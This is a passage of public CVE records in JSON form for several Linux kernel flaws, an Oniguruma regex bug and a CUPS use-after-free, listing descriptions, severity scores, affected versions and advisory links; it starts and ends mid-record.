"description": "CWE-824 Access of Uninitialized Pointer", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-23T14:14:27.857Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e" }, { "url": "https://kernel.dance/#b1a2cd50c0357f243b7435a732b4e62ba3157a2e" } ], "source": { "discovery": "EXTERNAL" }, "title": "Info Leak in l2cap_core in the Linux Kernel", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2022-42895", "datePublished": "2022-11-23T14:11:33.340Z", "dateReserved": "2022-10-12T18:30:19.769Z", "dateUpdated": "2024-08-03T13:19:05.390Z", "requesterUserId": "ed9b5bb2-2df1-4aa3-9791-5fb260d88e62", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-45887
Vulnerability from cvelistv5
Published
2022-11-25 00:00
Modified
2024-08-03 14:24
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 6.0.9. drivers/media/usb/ttusb-dec/ttusb_dec.c has a memory leak because of the lack of a dvb_frontend_detach call.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T14:24:03.181Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/linux-media/20221115131822.6640-1-imv4bel%40gmail.com/" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/linux-media/20221115131822.6640-5-imv4bel%40gmail.com/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230113-0006/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=517a281338322ff8293f988771c98aaa7205e457" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 6.0.9. drivers/media/usb/ttusb-dec/ttusb_dec.c has a memory leak because of the lack of a dvb_frontend_detach call." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:40:48.719153", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/linux-media/20221115131822.6640-1-imv4bel%40gmail.com/" }, { "url": "https://lore.kernel.org/linux-media/20221115131822.6640-5-imv4bel%40gmail.com/" }, { "url": "https://security.netapp.com/advisory/ntap-20230113-0006/" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=517a281338322ff8293f988771c98aaa7205e457" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-45887", "datePublished": "2022-11-25T00:00:00", "dateReserved": "2022-11-25T00:00:00", "dateUpdated": "2024-08-03T14:24:03.181Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3772
Vulnerability from cvelistv5
Published
2023-07-25 15:47
Modified
2024-09-13 18:23
Severity ?
EPSS score ?
Summary
Kernel: xfrm: null pointer dereference in xfrm_update_ae_params()
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2023:6583 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2023:6901 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2023:7077 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0412 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0575 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-3772 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2218943 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:08:49.645Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/08/10/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/08/10/3" }, { "name": "RHSA-2023:6583", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6583" }, { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-3772" }, { "name": "RHBZ#2218943", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218943" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.rt7.307.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.43.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.8.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.8.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Lin Ma (ZJU \u0026 Ant Security Light-Year Lab) for reporting this issue." } ], "datePublic": "2023-07-21T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel\u2019s IP framework for transforming packets (XFRM subsystem). This issue may allow a malicious user with CAP_NET_ADMIN privileges to directly dereference a NULL pointer in xfrm_update_ae_params(), leading to a possible kernel crash and denial of service." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T18:23:08.254Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2023:6583", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6583" }, { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-3772" }, { "name": "RHBZ#2218943", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218943" } ], "timeline": [ { "lang": "en", "time": "2023-06-29T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-07-21T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: xfrm: null pointer dereference in xfrm_update_ae_params()", "x_redhatCweChain": "CWE-476: NULL Pointer Dereference" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-3772", "datePublished": "2023-07-25T15:47:40.183Z", "dateReserved": "2023-07-19T13:55:07.799Z", "dateUpdated": "2024-09-13T18:23:08.254Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-19012
Vulnerability from cvelistv5
Published
2019-11-16 15:30
Modified
2024-08-05 02:02
Severity ?
EPSS score ?
Summary
An integer overflow in the search_in_range function in regexec.c in Oniguruma 6.x before 6.9.4_rc2 leads to an out-of-bounds read, in which the offset of this read is under the control of an attacker. (This only affects the 32-bit compiled version). Remote attackers can cause a denial-of-service or information disclosure, or possibly have unspecified other impact, via a crafted regular expression.
References
▼ | URL | Tags |
---|---|---|
https://github.com/kkos/oniguruma/issues/164 | x_refsource_MISC | |
https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2 | x_refsource_MISC | |
https://github.com/tarantula-team/CVE-2019-19012 | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.debian.org/debian-lts-announce/2019/12/msg00002.html | mailing-list, x_refsource_MLIST | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/ | vendor-advisory, x_refsource_FEDORA | |
https://usn.ubuntu.com/4460-1/ | vendor-advisory, x_refsource_UBUNTU |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T02:02:39.918Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/issues/164" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/tarantula-team/CVE-2019-19012" }, { "name": "FEDORA-2019-d942abd0d4", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/" }, { "name": "[debian-lts-announce] 20191204 [SECURITY] [DLA 2020-1] libonig security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00002.html" }, { "name": "FEDORA-2019-73197ff9a0", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/" }, { "name": "USN-4460-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/4460-1/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An integer overflow in the search_in_range function in regexec.c in Oniguruma 6.x before 6.9.4_rc2 leads to an out-of-bounds read, in which the offset of this read is under the control of an attacker. (This only affects the 32-bit compiled version). Remote attackers can cause a denial-of-service or information disclosure, or possibly have unspecified other impact, via a crafted regular expression." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-08-24T13:06:06", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kkos/oniguruma/issues/164" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/tarantula-team/CVE-2019-19012" }, { "name": "FEDORA-2019-d942abd0d4", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/" }, { "name": "[debian-lts-announce] 20191204 [SECURITY] [DLA 2020-1] libonig security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00002.html" }, { "name": "FEDORA-2019-73197ff9a0", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/" }, { "name": "USN-4460-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/4460-1/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2019-19012", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An integer overflow in the search_in_range function in regexec.c in Oniguruma 6.x before 6.9.4_rc2 leads to an out-of-bounds read, in which the offset of this read is under the control of an attacker. (This only affects the 32-bit compiled version). Remote attackers can cause a denial-of-service or information disclosure, or possibly have unspecified other impact, via a crafted regular expression." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/kkos/oniguruma/issues/164", "refsource": "MISC", "url": "https://github.com/kkos/oniguruma/issues/164" }, { "name": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2", "refsource": "MISC", "url": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2" }, { "name": "https://github.com/tarantula-team/CVE-2019-19012", "refsource": "MISC", "url": "https://github.com/tarantula-team/CVE-2019-19012" }, { "name": "FEDORA-2019-d942abd0d4", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/" }, { "name": "[debian-lts-announce] 20191204 [SECURITY] [DLA 2020-1] libonig security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00002.html" }, { "name": "FEDORA-2019-73197ff9a0", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/" }, { "name": "USN-4460-1", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/4460-1/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2019-19012", "datePublished": "2019-11-16T15:30:47", "dateReserved": "2019-11-16T00:00:00", "dateUpdated": "2024-08-05T02:02:39.918Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0597
Vulnerability from cvelistv5
Published
2023-02-23 00:00
Modified
2024-08-02 05:17
Severity ?
EPSS score ?
Summary
A flaw possibility of memory leak in the Linux kernel cpu_entry_area mapping of X86 CPU data to memory was found in the way user can guess location of exception stack(s) or other important data. A local user could use this flaw to get access to some important data with expected location in memory.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:17:50.079Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/linus/97e3d26b5e5f371b3ee223d94dd123e6c442ba80" }, { "name": "[oss-security] 20230728 Re: StackRot (CVE-2023-3269): Linux kernel privilege escalation vulnerability", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/28/1" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 6.2-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw possibility of memory leak in the Linux kernel cpu_entry_area mapping of X86 CPU data to memory was found in the way user can guess location of exception stack(s) or other important data. A local user could use this flaw to get access to some important data with expected location in memory." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-200", "description": "CWE-200", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-28T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/linus/97e3d26b5e5f371b3ee223d94dd123e6c442ba80" }, { "name": "[oss-security] 20230728 Re: StackRot (CVE-2023-3269): Linux kernel privilege escalation vulnerability", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/28/1" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-0597", "datePublished": "2023-02-23T00:00:00", "dateReserved": "2023-01-31T00:00:00", "dateUpdated": "2024-08-02T05:17:50.079Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-34241
Vulnerability from cvelistv5
Published
2023-06-22 22:39
Modified
2024-08-02 16:01
Severity ?
EPSS score ?
Summary
CUPS vulnerable to use-after-free in cupsdAcceptClient()
References
Impacted products
▼ | Vendor | Product |
---|---|---|
OpenPrinting | cups |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T16:01:54.315Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-qjgh-5hcq-5f25", "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-qjgh-5hcq-5f25" }, { "name": "https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2" }, { "name": "https://github.com/OpenPrinting/cups/releases/tag/v2.4.6", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/OpenPrinting/cups/releases/tag/v2.4.6" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/06/23/10" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/06/26/1" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TBIYKDS3UG3W4Z7YOHTR2AWFNBRYPNYY/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00038.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7I7DWGYGEMBNLZF5UQBMF3SONR37YUBN/" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213843" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213844" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213845" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "cups", "vendor": "OpenPrinting", "versions": [ { "status": "affected", "version": "\u003e= 2.0.0, \u003c 2.4.6" } ] } ], "descriptions": [ { "lang": "en", "value": "OpenPrinting CUPS is a standards-based, open source printing system for Linux and other Unix-like operating systems. Starting in version 2.0.0 and prior to version 2.4.6, CUPS logs data of free memory to the logging service AFTER the connection has been closed, when it should have logged the data right before. This is a use-after-free bug that impacts the entire cupsd process.\n\nThe exact cause of this issue is the function `httpClose(con-\u003ehttp)` being called in `scheduler/client.c`. The problem is that httpClose always, provided its argument is not null, frees the pointer at the end of the call, only for cupsdLogClient to pass the pointer to httpGetHostname. This issue happens in function `cupsdAcceptClient` if LogLevel is warn or higher and in two scenarios: there is a double-lookup for the IP Address (HostNameLookups Double is set in `cupsd.conf`) which fails to resolve, or if CUPS is compiled with TCP wrappers and the connection is refused by rules from `/etc/hosts.allow` and `/etc/hosts.deny`.\n\nVersion 2.4.6 has a patch for this issue." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416: Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-06-22T22:39:32.400Z", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-qjgh-5hcq-5f25", "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-qjgh-5hcq-5f25" }, { "name": "https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2" }, { "name": "https://github.com/OpenPrinting/cups/releases/tag/v2.4.6", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/OpenPrinting/cups/releases/tag/v2.4.6" }, { "url": "http://www.openwall.com/lists/oss-security/2023/06/23/10" }, { "url": "http://www.openwall.com/lists/oss-security/2023/06/26/1" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TBIYKDS3UG3W4Z7YOHTR2AWFNBRYPNYY/" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00038.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7I7DWGYGEMBNLZF5UQBMF3SONR37YUBN/" }, { "url": "https://support.apple.com/kb/HT213843" }, { "url": "https://support.apple.com/kb/HT213844" }, { "url": "https://support.apple.com/kb/HT213845" } ], "source": { "advisory": "GHSA-qjgh-5hcq-5f25", "discovery": "UNKNOWN" }, "title": "CUPS vulnerable to use-after-free in cupsdAcceptClient()" } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2023-34241", "datePublished": "2023-06-22T22:39:32.400Z", "dateReserved": "2023-05-31T13:51:51.171Z", "dateUpdated": "2024-08-02T16:01:54.315Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-4744
Vulnerability from cvelistv5
Published
2023-03-30 00:00
Modified
2024-08-03 01:48
Severity ?
EPSS score ?
Summary
A double-free flaw was found in the Linux kernel’s TUN/TAP device driver functionality in how a user registers the device when the register_netdevice function fails (NETDEV_REGISTER notifier). This flaw allows a local user to crash or potentially escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:48:40.427Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=158b515f703e" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/171912/CentOS-Stream-9-Missing-Kernel-Security-Fix.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230526-0009/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 5.16-rc7" } ] } ], "descriptions": [ { "lang": "en", "value": "A double-free flaw was found in the Linux 